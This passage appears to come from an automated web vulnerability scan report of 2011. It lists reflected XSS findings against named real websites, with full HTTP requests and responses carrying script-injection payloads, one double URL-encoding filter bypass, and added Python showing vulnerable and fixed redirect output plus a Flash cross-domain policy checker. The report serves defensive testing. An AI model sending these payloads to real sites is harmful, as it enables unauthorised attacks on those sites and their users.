<link rel="stylesheet" type="text/css" href="http://www.wine.com/includes/css/defaultsixC.css" />
<script language="JavaScript" type="t
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/favicon.icod17b8"><script>alert(1)</script>6dd24e38d99" value="" />
...[SNIP]...

6.107. http://www.courts.info/favicon.ico [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.courts.info
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 55832<script>alert(1)</script>0884fff0392 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.courts.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=55832<script>alert(1)</script>0884fff0392

Response

HTTP/1.1 404 OK
Date: Tue, 03 May 2011 20:49:09 GMT
Expires: Tue, 03 May 2011 20:49:09 GMT
Content-Length: 697
Content-Type: text/html

<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>404 Not Found</H1>
<P>
<STRONG>User:</strong> 173.193.214.243 : 51032<BR>
<STRONG>Domn:</strong> WWW.COURTS.INFO<BR>
<STRONG>Host:</s
...[SNIP]...
<BR>
Referer: http://www.google.com/search?hl=en&q=55832<script>alert(1)</script>0884fff0392<BR>
...[SNIP]...

6.108. http://www.courts.info/favicon.ico [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.courts.info
Path:   /favicon.ico

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 34fc6<script>alert(1)</script>04839b2ad02 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.334fc6<script>alert(1)</script>04839b2ad02
Host: www.courts.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 OK
Date: Tue, 03 May 2011 20:49:06 GMT
Expires: Tue, 03 May 2011 20:49:06 GMT
Content-Length: 645
Content-Type: text/html

<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>404 Not Found</H1>
<P>
<STRONG>User:</strong> 173.193.214.243 : 50920<BR>
<STRONG>Domn:</strong> WWW.COURTS.INFO<BR>
<STRONG>Host:</s
...[SNIP]...
<BR>
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.334fc6<script>alert(1)</script>04839b2ad02<BR>
...[SNIP]...

6.109. http://www.democratsenators.org/favicon.ico [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.democratsenators.org
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 221fc<script>alert(1)</script>2dfd3bdfab3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.democratsenators.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=221fc<script>alert(1)</script>2dfd3bdfab3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=369BEF78AF569E8FE72068A8BEA3D26B-n3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 04 May 2011 02:15:27 GMT
Set-Cookie: Coyote-2-aae531e=aae52cb:0; path=/
Content-Length: 1322

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
</script>2dfd3bdfab3'>http://www.google.com/search?hl=en&q=221fc<script>alert(1)</script>2dfd3bdfab3</a>
...[SNIP]...

6.110. http://www.democratsenators.org/favicon.ico [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.democratsenators.org
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64812'><script>alert(1)</script>50bbdc68680 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.democratsenators.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=64812'><script>alert(1)</script>50bbdc68680

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=020D993D49405BD7D59DFB29D036AEB3-n2; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 04 May 2011 02:15:27 GMT
Set-Cookie: Coyote-2-aae531e=aae52ca:0; path=/
Content-Length: 1326

<div id="404container" class="error404">
<h2>We're sorry--that page isn't here. You can use your back button to return to the previous page.</h2>


<p>It looks like you've requested a page that is cu
...[SNIP]...
<a href='http://www.google.com/search?hl=en&q=64812'><script>alert(1)</script>50bbdc68680'>
...[SNIP]...

6.111. http://www.jpeterman.com/favicon.ico [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.jpeterman.com
Path:   /favicon.ico

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 60bbd--><script>alert(1)</script>e8e97a34f5d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.360bbd--><script>alert(1)</script>e8e97a34f5d
Host: www.jpeterman.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private, no-store
Content-Length: 10719
Content-Type: text/html; charset=utf-8
Expires: Tue, 03 May 2011 01:20:01 GMT
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ThePage_ECommerce_STATE=qY1Y4zgsGyT50k21Hhrbdg; path=/
Set-Cookie: SessModDt=5/3/2011 6:20:01 PM; expires=Tue, 04-May-2021 01:20:01 GMT; path=/
Date: Wed, 04 May 2011 01:20:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Page: /404.rsp?404http://www.jpeterman.com:80/favicon.ico Url: http://ww
...[SNIP]...
<!-- IP: 173.193.214.243 User: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.360bbd--><script>alert(1)</script>e8e97a34f5d -->
...[SNIP]...

6.112. http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf [meld_sess cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/489/cnetnews/300x250/cnetnews_atf

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f77e"><script>alert(1)</script>2c599ac421f was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb95f77e"><script>alert(1)</script>2c599ac421f; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1973
Content-Type: text/html
Date: Wed, 04 May 2011 01:29:18 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">



...[SNIP]...
<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb95f77e"><script>alert(1)</script>2c599ac421f&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...

6.113. http://tracking.moon-ray.com/track.php [sess_ cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracking.moon-ray.com
Path:   /track.php

Issue detail

The value of the sess_ cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 120cf'%3balert(1)//3ee93f62c0a was submitted in the sess_ cookie. This input was echoed as 120cf';alert(1)//3ee93f62c0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/&s=ysv9sd684163c3y&l=www.theamericanmonk.com/&ti=The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com&r=1&t=mr_7&vid=206617815 HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_=ysv9sd684163c3y120cf'%3balert(1)//3ee93f62c0a; mr_src=mr_7

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 01:02:16 GMT
Connection: Keep-Alive
Set-Cookie: mr_src=mr_7; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 309

_mrd.cookie='sess_=ysv9sd684163c3y120cf';alert(1)//3ee93f62c0a;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='ref_=mr_7;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206618129;' + _mr_ex + ';' + 'path=/';_mrd.cookie = 't_=mr_7;' + _mr_ex + ';'+'path=/';var _mrTrackLi
...[SNIP]...

6.114. http://www.nextbigfuture.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextbigfuture.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d60d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c1fd9d84d6 was submitted in the REST URL parameter 1. This input was echoed as 8d60d"><script>alert(1)</script>6c1fd9d84d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico8d60d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6c1fd9d84d6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextbigfuture.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 03:26:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash06
X-AspNet-Version: 2.0.50727
Content-Length: 200
Location: http://nextbigfuture.com/favicon.ico8d60d"><script>alert(1)</script>6c1fd9d84d6
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://nextbigfuture.com/favicon.ico8d60d"><script>alert(1)</script>6c1fd9d84d6">here</a>.</body>

6.115. http://www.nextbigfuture.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextbigfuture.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9be1c"><script>alert(1)</script>b1dc0d82006 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?9be1c"><script>alert(1)</script>b1dc0d82006=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nextbigfuture.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Connection: close
Date: Wed, 04 May 2011 03:26:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash03
X-AspNet-Version: 2.0.50727
Content-Length: 203
Location: http://nextbigfuture.com/favicon.ico?9be1c"><script>alert(1)</script>b1dc0d82006=1
Cache-Control: private
Content-Type: text/html

<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://nextbigfuture.com/favicon.ico?9be1c"><script>alert(1)</script>b1dc0d82006=1">here</a>.</body
...[SNIP]...

6.116. http://www.pilotpentennis.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pilotpentennis.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4ffb3<script>alert(1)</script>ab30ad0dce6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?4ffb3<script>alert(1)</script>ab30ad0dce6=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pilotpentennis.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 04 May 2011 02:02:08 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 265
Location: http://www.newhavenopen.com/favicon.ico?4ffb3<script>alert(1)</script>ab30ad0dce6=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.newhavenopen.com/favicon.ico?4ffb3<script>alert(1)</script>ab30ad0dce6=1">http://www.newhavenopen.com/favicon.ico?4ffb3<script>alert(1)</script>ab30ad0dce6=1</a>
...[SNIP]...

6.117. http://www.pilotpentennis.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pilotpentennis.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51cba"><script>alert(1)</script>6765bf89c5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?51cba"><script>alert(1)</script>6765bf89c5c=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pilotpentennis.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 04 May 2011 02:02:08 GMT
Server: Microsoft-IIS/6.0
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 269
Location: http://www.newhavenopen.com/favicon.ico?51cba"><script>alert(1)</script>6765bf89c5c=1

<html><body>The requested resource was moved. It could be found here: <a href="http://www.newhavenopen.com/favicon.ico?51cba"><script>alert(1)</script>6765bf89c5c=1">http://www.newhavenopen.com/favico
...[SNIP]...

6.118. http://www.safecu.org/favicon.ico [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.safecu.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63257"><script>alert(1)</script>8571f9c9a7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico63257"><script>alert(1)</script>8571f9c9a7a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.safecu.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object Moved
Server: NS_6.1
Location: https://www.safecu.org/favicon.ico63257"><script>alert(1)</script>8571f9c9a7a
Content Type: text/html
Cache Control: private
Connection: close

<head><body> This object may be found <a HREF="https://www.safecu.org/favicon.ico63257"><script>alert(1)</script>8571f9c9a7a">here</a> </body>

6.119. http://www.safecu.org/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.safecu.org
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd1cb"><script>alert(1)</script>b00754852b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?fd1cb"><script>alert(1)</script>b00754852b8=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.safecu.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object Moved
Server: NS_6.1
Location: https://www.safecu.org/favicon.ico?fd1cb"><script>alert(1)</script>b00754852b8=1
Content Type: text/html
Cache Control: private
Connection: close

<head><body> This object may be found <a HREF="https://www.safecu.org/favicon.ico?fd1cb"><script>alert(1)</script>b00754852b8=1">here</a> </body>
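The findings above share one pattern: the server answers with a 3xx, copies the raw request-URI into the Location header, and concatenates the same URI into the href of a short "Object moved" body without encoding it, so a literal double quote in the URI closes the attribute. The Python below is an added illustration, not code from the report or from any of the servers listed; it rebuilds that body construction, shows the encoding that stops the attribute break-out, and applies the report's own triage rule (a redirect body is not rendered while the Location header is honoured). The probe string and hostnames are reused from the findings as constructed test data; the function names are assumptions.

```python
import html
from urllib.parse import quote

# Constructed probe, modelled on the marker-style request-URIs in the findings above.
PROBE_URI = '/favicon.ico?9be1c"><script>alert(1)</script>b1dc0d82006=1'
PAYLOAD = '"><script>alert(1)</script>'

# Shape of the body returned by the captured servers.
TEMPLATE = ('<head><title>Object moved</title></head><body><h1>Object Moved</h1>'
            'This object may be found <a HREF="{href}">here</a>.</body></html>')


def redirect_body_vulnerable(target_host, request_uri):
    """Concatenate the raw request-URI into a double-quoted href.
    A literal " in the URI terminates the attribute and everything after it
    is parsed as markup, which is the reflection the findings report."""
    return TEMPLATE.format(href=f"http://{target_host}{request_uri}")


def redirect_body_hardened(target_host, request_uri):
    """Two layers of encoding for the same body.
    1. Percent-encode the URI so ", <, >, ( and ) cannot appear in the URL
       at all (the Location header should carry this encoded form too).
       '%' is kept so a URI that arrived already encoded is not double-encoded.
    2. HTML-escape for the attribute context; html.escape(quote=True) turns
       any remaining " into &quot; and < into &lt;."""
    safe_uri = quote(request_uri, safe="/?=&%")
    location = f"http://{target_host}{safe_uri}"
    return TEMPLATE.format(href=html.escape(location, quote=True))


def triage_reflection(status, headers, body, payload=PAYLOAD):
    """Classify a reflected payload the way the report's caveat does.
    'none'     - payload is not echoed verbatim.
    'redirect' - echoed, but into the body of a 3xx that carries a Location
                 header; browsers follow the redirect and do not render it,
                 so impact is limited unless the redirect can be suppressed.
    'rendered' - echoed into a body the browser will parse."""
    if payload not in body:
        return "none"
    has_location = any(name.lower() == "location" for name in headers)
    if 300 <= status < 400 and has_location:
        return "redirect"
    return "rendered"


if __name__ == "__main__":
    host = "nextbigfuture.com"
    for label, body in (("vulnerable", redirect_body_vulnerable(host, PROBE_URI)),
                        ("hardened", redirect_body_hardened(host, PROBE_URI))):
        print(label, triage_reflection(302, {"Location": f"http://{host}/favicon.ico"}, body))
        print("   ", body[body.index("<a HREF"):body.index("here</a>")])
```

The triage function also captures the report's "interfering with the response headers" remark: feed it the same vulnerable body with a 200 status or without a Location header and it reports "rendered", which is the condition under which the reflection becomes a working reflected XSS.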

7. Flash cross-domain policy
There are 384 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
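The review the remediation text asks for can be made mechanical. The Python below is an added example, not part of the report and not taken from any host listed in it: it parses a crossdomain.xml and lists which domains the policy trusts and which elements widen that trust (a wildcard or suffix wildcard in allow-access-from, secure="false", a wildcard allow-http-request-headers-from, and a site-control value of "all" that lets any file on the host act as a policy). Both policy documents are constructed samples; the function name is an assumption.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the over-permissive shape that earns a finding.
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-access-from domain="*.partner.example"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
"""

# Constructed sample: a policy scoped to one named host over HTTPS only.
TIGHT_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="static.example" secure="true"/>
</cross-domain-policy>
"""


def review_crossdomain_policy(xml_text):
    """Return {'trusted': [domains], 'findings': [reasons]} for a policy.
    Every allowed domain is listed so the reviewer can judge its intentions
    and security posture; findings name the element and why it matters."""
    root = ET.fromstring(xml_text)
    trusted = []
    findings = []

    for el in root.iter("allow-access-from"):
        domain = el.get("domain", "")
        trusted.append(domain)
        if domain == "*":
            findings.append('allow-access-from domain="*": any origin can make '
                            'credentialed two-way requests as the logged-in user')
        elif domain.startswith("*."):
            findings.append(f'allow-access-from domain="{domain}": every host under '
                            'that suffix is trusted, including any that is compromised')
        # secure="false" lets a SWF loaded over plain HTTP reach HTTPS content.
        if el.get("secure", "true").lower() == "false":
            findings.append(f'allow-access-from domain="{domain}" secure="false": '
                            'HTTP-loaded content may read this HTTPS origin')

    for el in root.iter("allow-http-request-headers-from"):
        if el.get("domain") == "*":
            findings.append('allow-http-request-headers-from domain="*": arbitrary '
                            'origins may send custom request headers')

    site_control = root.find("site-control")
    if site_control is not None and site_control.get("permitted-cross-domain-policies") == "all":
        findings.append('site-control permitted-cross-domain-policies="all": any file '
                        'on the host, including user uploads, may act as a policy')

    return {"trusted": trusted, "findings": findings}


if __name__ == "__main__":
    for name, policy in (("permissive", PERMISSIVE_POLICY), ("tight", TIGHT_POLICY)):
        result = review_crossdomain_policy(policy)
        print(name, "trusts", result["trusted"])
        for finding in result["findings"]:
            print("  -", finding)
```

Run it against the crossdomain.xml fetched from each host in the instance list; a policy with an empty findings list still deserves a look at the named domains, since the trust it grants extends to the security posture of those sites as well as their intentions.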


7.1. http://ad.doubleclick.net/crossdomain.xml

Summary

Severity: